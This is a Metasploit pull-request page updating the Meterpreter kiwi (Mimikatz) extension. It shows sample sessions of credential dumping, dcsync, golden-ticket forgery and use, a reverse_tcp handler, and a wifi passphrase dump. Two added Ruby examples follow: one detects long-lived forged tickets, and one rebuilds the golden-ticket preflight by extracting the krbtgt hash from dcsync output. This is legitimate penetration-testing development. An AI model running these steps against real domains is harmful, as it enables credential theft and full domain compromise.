
Revamp Kiwi to work off Mimikatz subrepo #7744

Merged
merged 16 commits into from Dec 29, 2016

7 participants

OJ commented Dec 23, 2016

This PR requires changes made in the Meterpreter PR here: rapid7/metasploit-payloads#160

The long awaited Kiwi update is here. This PR contains code that makes use of the new updates to the kiwi extension, which now works off Mimikatz as a subrepo and supports all the new whiz bang features that @gentilkiwi has added in v2.1.

From here, exposing new Mimikatz features that Ben builds should be rather trivial! Hooray for more frequent updates.

This should work on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016.

Details

  • The creds_livessp command isn't available at this point because it doesn't seem to be used.
  • All the other creds_* commands should work like they used to, with slightly different output.
  • The kiwi API has changed a little bit, but that's not too interesting.
  • The golden_ticket module has been updated to use the new API.
  • New commands have been added to make use of new features.
  • dcsync is a straight dump from mimikatz, and dcsync_ntlm does some rudimentary parsing for the sake of easy scripting, but they both use the same thing behind the scenes.
  • Listing of kerb tickets no longer supports exporting. No biggie though.
  • Golden tickets are now stored in base64 format.
  • kiwi_cmd lets you fire a custom command directly at mimikatz. Be careful with this!
  • lsa_dump has been split into lsa_dump_secrets and lsa_dump_sam.

Sample run

meterpreter > use kiwi 


  .#####.   mimikatz 2.1 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.
meterpreter > ?
... snip ...
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    wifi_list              List wifi profiles/creds

meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain  LM                                NTLM
--------          ------  --                                ----
Administrator     CORP    <redacted>  <redacted>
WIN-NDGU3JDSJE3$  CORP    <redacted>  <redacted>
oj                CORP    <redacted>  <redacted>

ssp credentials
===============

Username  Domain  Password
--------  ------  --------
oj        CORP    <redacted>

wdigest credentials
===================

Username          Domain  Password
--------          ------  --------
(null)            (null)  (null)
Administrator     CORP    <redacted>
WIN-NDGU3JDSJE3$  CORP    <redacted>
oj                CORP    <redacted>

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  CORP    <redacted>
oj             CORP    <redacted>

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     CORP.PWND.LOCAL  <redacted>
win-ndgu3jdsje3$  CORP.PWND.LOCAL  <redacted>


meterpreter > golden_ticket_create -u 'CORP\Administrator' -d CORP.PWND.LOCAL -t /tmp/ticket
[!] Running as SYSTEM, function will not work.
meterpreter > rev2self 
meterpreter > golden_ticket_create -u 'CORP\Administrator' -d CORP.PWND.LOCAL -t /tmp/ticket
[!] NTLM hash for krbtgt missing, using <redacted> extracted from CORP\krbtgt
[!] Domain SID missing, using <redacted> extracted from SID of CORP\krbtgt
[+] Golden Kerberos ticket written to /tmp/ticket
meterpreter > background
[*] Backgrounding session 3...
msf exploit(handler) > sess 4
[*] Starting interaction with 4...

meterpreter > use kiwi 


  .#####.   mimikatz 2.1 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.
meterpreter > kerberos_ticket_use /tmp/ticket
[*] Using Kerberos ticket stored in /tmp/ticket, 1912 bytes ...
[+] Kerberos ticket applied successfully.
meterpreter > kerberos_ticket_list 
[+] Kerberos tickets found in the current session.
[00000000] - 0x00000017 - rc4_hmac_nt      
   Start/End/MaxRenew: 12/23/2016 9:52:42 AM ; 12/21/2026 9:52:42 AM ; 12/21/2026 9:52:42 AM
   Server Name       : krbtgt/CORP.PWND.LOCAL @ CORP.PWND.LOCAL
   Client Name       : Administrator @ CORP.PWND.LOCAL
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

meterpreter > dcsync
Usage: dcsync <DOMAIN\user>

meterpreter > dcsync 'CORP\oj'
[DC] 'corp.pwnd.local' will be the domain
[DC] 'WIN-68DAJU5BIFF.corp.pwnd.local' will be the DC server
[DC] 'CORP\oj' will be the user account

Object RDN           : oj

** SAM ACCOUNT **

SAM Username         : oj
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1/1/1601 10:00:00 AM
Password last change : 12/20/2016 11:52:31 AM
Object Security ID   : <redacted>
Object Relative ID   : 1000

Credentials:
  Hash NTLM: <redacted>

meterpreter > dcsync_ntlm 'CORP\krbtgt'
[+] Account   : CORP\krbtgt
[+] NTLM Hash : <redacted>
[+] LM Hash   : <redacted>
[+] SID       : <redacted>
[+] RID       : 502

This was run on a Windows 7 machine talking to a Windows 2016 DC. This also works on Windows 10 based on my testing.

Verification

You're going to need a domain and a pleb machine connected to the domain.

  • Create two Meterpreter sessions on the target, with the right architecture. One session as Admin, one as a pleb user.
  • Switch to SYSTEM and run all the creds commands, make sure they work.
  • Run the lsa dump commands, make sure they work.
  • Create a golden ticket with the admin session (you'll need to rev2self).
  • Apply it to the pleb session.
  • Verify that the pleb session has the ticket by listing kerb tickets.
  • Check the new commands and make sure they behave.
  • Also get a session on a machine that has wifi profiles, and check the wifi dump command still works.

Thanks

As always, @gentilkiwi did the hard yards here, for doing dev on the fly to help me out, and for helping me realise my stupidity in certain areas.
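
The golden ticket in the sample run above is valid for ten years, far beyond what a domain's Kerberos policy normally issues. As an added example (not code from this PR or from the kiwi extension), the Ruby below parses `kerberos_ticket_list` output in the exact shape shown and flags tickets whose validity or renewal window exceeds the Active Directory default maximums of 10 hours and 7 days. The listing it reads is reconstructed from the PR's own output; the thresholds are parameters, and the AD defaults are an assumption about the target domain's policy.

```ruby
# Added example, not part of the PR or the kiwi extension: parse the unparsed
# `kerberos_ticket_list` output and flag tickets with abnormal lifetimes, which
# is how a forged (golden) ticket like the one in the PR stands out.
require 'time'

# Constructed sample: the ticket listing from the PR, same layout.
SAMPLE_TICKET_LIST = <<~EOS
  [+] Kerberos tickets found in the current session.
  [00000000] - 0x00000017 - rc4_hmac_nt
     Start/End/MaxRenew: 12/23/2016 9:52:42 AM ; 12/21/2026 9:52:42 AM ; 12/21/2026 9:52:42 AM
     Server Name       : krbtgt/CORP.PWND.LOCAL @ CORP.PWND.LOCAL
     Client Name       : Administrator @ CORP.PWND.LOCAL
     Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
EOS

# Active Directory default Kerberos policy (assumed; a hardened domain may be
# stricter): max user ticket lifetime 10 hours, max renewal 7 days.
DEFAULT_MAX_TGT_LIFETIME = 10 * 3600
DEFAULT_MAX_RENEW        = 7 * 24 * 3600

# Mimikatz prints US-style timestamps: M/D/YYYY h:mm:ss AM
def parse_kiwi_time(str)
  Time.strptime(str.strip, '%m/%d/%Y %I:%M:%S %p')
end

# Returns one hash per "[index] - 0xetype - name" block in the listing.
def parse_ticket_list(text)
  tickets = []
  current = nil
  text.each_line do |line|
    if (m = line.match(/^\[(\h{8})\] - 0x(\h+) - (\S+)/))
      current = { index: m[1].to_i(16), etype: m[2].to_i(16), etype_name: m[3] }
      tickets << current
      next
    end
    next unless current # property lines before any header are ignored

    case line
    when %r{Start/End/MaxRenew:\s*(.+?)\s*;\s*(.+?)\s*;\s*(.+?)\s*$}
      current[:start]     = parse_kiwi_time($1)
      current[:end]       = parse_kiwi_time($2)
      current[:max_renew] = parse_kiwi_time($3)
    when /Server Name\s*:\s*(.+?)\s*$/
      current[:server] = $1
    when /Client Name\s*:\s*(.+?)\s*$/
      current[:client] = $1
    when /Flags\s+(\h+)\s*:\s*(.*)$/
      current[:flags]      = $1.to_i(16)
      current[:flag_names] = $2.split(';').map(&:strip).reject(&:empty?)
    end
  end
  tickets
end

# Whole days between issue and expiry, rounded (DST shifts do not matter here).
def ticket_lifetime_days(ticket)
  ((ticket[:end] - ticket[:start]) / 86_400).round
end

# Tickets whose validity or renewal window exceeds the policy maximums.
def suspicious_tickets(tickets, max_lifetime: DEFAULT_MAX_TGT_LIFETIME, max_renew: DEFAULT_MAX_RENEW)
  tickets.select do |t|
    next false unless t[:start] && t[:end]
    lifetime = t[:end] - t[:start]
    renew    = t[:max_renew] ? t[:max_renew] - t[:start] : 0
    lifetime > max_lifetime || renew > max_renew
  end
end

if $PROGRAM_NAME == __FILE__
  suspicious_tickets(parse_ticket_list(SAMPLE_TICKET_LIST)).each do |t|
    puts "ticket #{t[:index]} #{t[:client]} -> #{t[:server]}: valid #{ticket_lifetime_days(t)} days"
  end
end
```

The ten-year ticket from the PR is reported as 3650 days; a legitimate TGT from a default-policy domain would never exceed the 10-hour lifetime or 7-day renewal window, so the same check over tickets collected from an endpoint is a cheap way to surface forged ones.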

OJ added some commits Aug 2, 2016

mubix commented Dec 23, 2016

I don't understand this part:

meterpreter > golden_ticket_create -u 'CORP\Administrator' -d CORP.PWND.LOCAL -t /tmp/ticket
[!] Running as SYSTEM, function will not work.

Shouldn't you be able to create a Golden Ticket literally on any box and in any context with the right set of information?

OJ commented Dec 23, 2016

@mubix from the testing I did, it didn't work under the context of the SYSTEM user, which is why I added that check.

OJ commented Dec 23, 2016

Could have just been me being stupid though ;)

void-in commented Dec 23, 2016

@OJ It might be that in SYSTEM context you are not able to read CORP\krbtgt which has the NTLM hash and domain SID. When you rev2self, you have the user account which holds the kerberos ticket and hence kiwi is able to extract those fields.

OJ commented Dec 23, 2016

That's a good point! The DCsync call might be the issue here. I will adjust this module so that if the dcsync call has to be made it checks for SYSTEM. Otherwise, we'll just push on ahead.

Thank you @void-in .

OJ commented Dec 23, 2016

meterpreter > golden_ticket_create -u 'CORP\Administrator' -t /tmp/zing -d CORP.PWND.LOCAL
[!] NTLM hash for krbtgt missing, using <redacted> extracted from CORP\krbtgt
[!] Domain SID missing, using <redacted> extracted from SID of CORP\krbtgt
[+] Golden Kerberos ticket written to /tmp/zing
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > golden_ticket_create -u 'CORP\Administrator' -t /tmp/zing -d CORP.PWND.LOCAL
[!] Unable to run module as SYSTEM unless krbtgt and domain sid are provided
meterpreter > golden_ticket_create -u 'CORP\Administrator' -t /tmp/zing -d CORP.PWND.LOCAL -s <redacted> -k <redacted>
[+] Golden Kerberos ticket written to /tmp/zing

There we go. Thanks @void-in, you were spot on.
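
To make the check this exchange ends on concrete, here is an added Ruby example (not the module's own code) that mirrors the behaviour shown in the PR description's sample run and in the session above: as SYSTEM it refuses unless both the krbtgt NTLM hash and the domain SID are passed explicitly; otherwise it fills the missing values from the `dcsync` output for krbtgt, deriving the domain SID by stripping the RID from the object SID, much as `dcsync_ntlm` pulls its fields out of the unparsed dump. The `dcsync` text it parses is a constructed stand-in in the layout the PR shows for CORP\oj, with placeholder hash and SID values, and `dcsync_output` is a hypothetical parameter that replaces the live call so the logic runs offline.

```ruby
# Added example, not the kiwi extension's own code: the golden_ticket_create
# pre-flight logic the thread settles on, plus the field extraction that
# dcsync_ntlm performs on unparsed dcsync output.

# Constructed stand-in for `dcsync 'CORP\krbtgt'` output. Hash and SID are
# placeholders, not real values.
SAMPLE_KRBTGT_DCSYNC = <<~'EOS'
  [DC] 'corp.pwnd.local' will be the domain
  [DC] 'WIN-68DAJU5BIFF.corp.pwnd.local' will be the DC server
  [DC] 'CORP\krbtgt' will be the user account

  Object RDN           : krbtgt

  ** SAM ACCOUNT **

  SAM Username         : krbtgt
  Account Type         : 30000000 ( USER_OBJECT )
  Object Security ID   : S-1-5-21-1111111111-2222222222-3333333333-502
  Object Relative ID   : 502

  Credentials:
    Hash NTLM: 00000000000000000000000000000000
EOS

# Pull the fields dcsync_ntlm reports out of the unparsed dcsync text.
def parse_dcsync(text)
  fields = {}
  text.each_line do |line|
    case line
    when /^SAM Username\s*:\s*(\S+)/            then fields[:username] = $1
    when /^Object Security ID\s*:\s*(S-[\d-]+)/ then fields[:sid]      = $1
    when /^Object Relative ID\s*:\s*(\d+)/      then fields[:rid]      = $1.to_i
    when /^\s*Hash NTLM:\s*(\h{32})/            then fields[:ntlm]     = $1
    end
  end
  fields
end

# A domain SID is the object SID with its trailing RID removed.
def domain_sid_from(object_sid)
  object_sid.sub(/-\d+\z/, '')
end

class PreflightError < StandardError; end

# Decide what the ticket needs, mirroring the module's behaviour:
#   - as SYSTEM, refuse unless both values were supplied;
#   - otherwise fill gaps from the dcsync dump of DOMAIN\krbtgt.
# `dcsync_output` is a hypothetical parameter standing in for the live call.
def golden_ticket_preflight(is_system:, krbtgt_hash: nil, domain_sid: nil, dcsync_output: nil)
  notes = []
  if krbtgt_hash && domain_sid
    return { krbtgt_hash: krbtgt_hash, domain_sid: domain_sid, notes: notes }
  end
  if is_system
    raise PreflightError, 'Unable to run module as SYSTEM unless krbtgt and domain sid are provided'
  end
  raise PreflightError, 'no dcsync output available' unless dcsync_output

  krbtgt = parse_dcsync(dcsync_output)
  unless krbtgt_hash
    krbtgt_hash = krbtgt[:ntlm]
    raise PreflightError, 'krbtgt NTLM hash not found in dcsync output' unless krbtgt_hash
    notes << "NTLM hash for krbtgt missing, using #{krbtgt_hash} extracted from krbtgt"
  end
  unless domain_sid
    raise PreflightError, 'krbtgt SID not found in dcsync output' unless krbtgt[:sid]
    domain_sid = domain_sid_from(krbtgt[:sid])
    notes << "Domain SID missing, using #{domain_sid} extracted from SID of krbtgt"
  end
  { krbtgt_hash: krbtgt_hash, domain_sid: domain_sid, notes: notes }
end

if $PROGRAM_NAME == __FILE__
  result = golden_ticket_preflight(is_system: false, dcsync_output: SAMPLE_KRBTGT_DCSYNC)
  result[:notes].each { |n| puts "[!] #{n}" }
  puts "[+] domain SID #{result[:domain_sid]}, krbtgt hash #{result[:krbtgt_hash]}"
end
```

The two `[!]` lines it prints correspond to the ones in the PR's sample run, and calling it with `is_system: true` and no explicit values raises the same refusal the updated module prints.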

bcook-r7 self-assigned this Dec 29, 2016

bcook-r7 commented Dec 29, 2016

obviously needed to verify that this works as well:

meterpreter > kiwi_cmd coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

I wasn't able to find a machine that had wifi immediately, but am not going to block on that - landing!

bcook-r7 merged commit 99da91e into rapid7:master Dec 29, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

bcook-r7 added a commit that referenced this pull request Dec 29, 2016

bcook-r7 commented Dec 29, 2016

Have fun guys, thanks again @OJ !

OJ commented Dec 29, 2016

Thank you @bcook-r7 👍 👍 👍 👍 👍 👍 👍 👍 👍 👍 👍

OJ deleted the OJ:kiwi-update branch Dec 29, 2016

bcook-r7 commented Dec 30, 2016

My pleasure, this was a big lift!

bcook-r7 commented Dec 30, 2016

Release Notes

The long awaited Kiwi update is here. This Meterpreter now makes use of the new updates to the kiwi extension, which now imports the latest Mimikatz release and supports all the new whiz bang features that @gentilkiwi has added in v2.1. Moving forward, updates should be much easier to port to Meterpreter in the future. The kiwi extension now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016.

Details

  • The creds_livessp command isn't available at this point because it doesn't seem to be used.
  • All the other creds_* commands should work like they used to, with slightly different output.
  • The golden_ticket module has been updated to use the new API.
  • New commands have been added to make use of new features.
  • dcsync is a straight dump from mimikatz, and dcsync_ntlm does some rudimentary parsing for the sake of easy scripting, but they both use the same thing behind the scenes.
  • Listing of kerb tickets no longer supports exporting. No biggie though.
  • Golden tickets are now stored in base64 format.
  • kiwi_cmd lets you fire a custom command directly at mimikatz. Be careful with this!
  • lsa_dump has been split into lsa_dump_secrets and lsa_dump_sam.

bwatters-r7 commented Jan 3, 2017

Wifi Testing

msf exploit(handler) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set port 4567
port => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_Pro_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_Pro_IP>:50261) at 2017-01-03 13:13:32 -0600

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > use kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.1 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.
meterpreter > wifi_list

Atheros AR9271 Wireless Network Adapter - {6561627b-3639-6635-612d-613537352d34}
================================================================================

Name          Auth     Type        Shared Key
----          ----     ----        ----------
Wireless2Ghz  WPA2PSK  passPhrase  <PASSPHRASE>

State: Connected

meterpreter > 

OJ commented Jan 3, 2017

pyllyukko commented Mar 10, 2017

Are there plans to add Metasploit credential store support to this extension? It would be super useful if, e.g., dcsynced hashes went directly to the creds database.
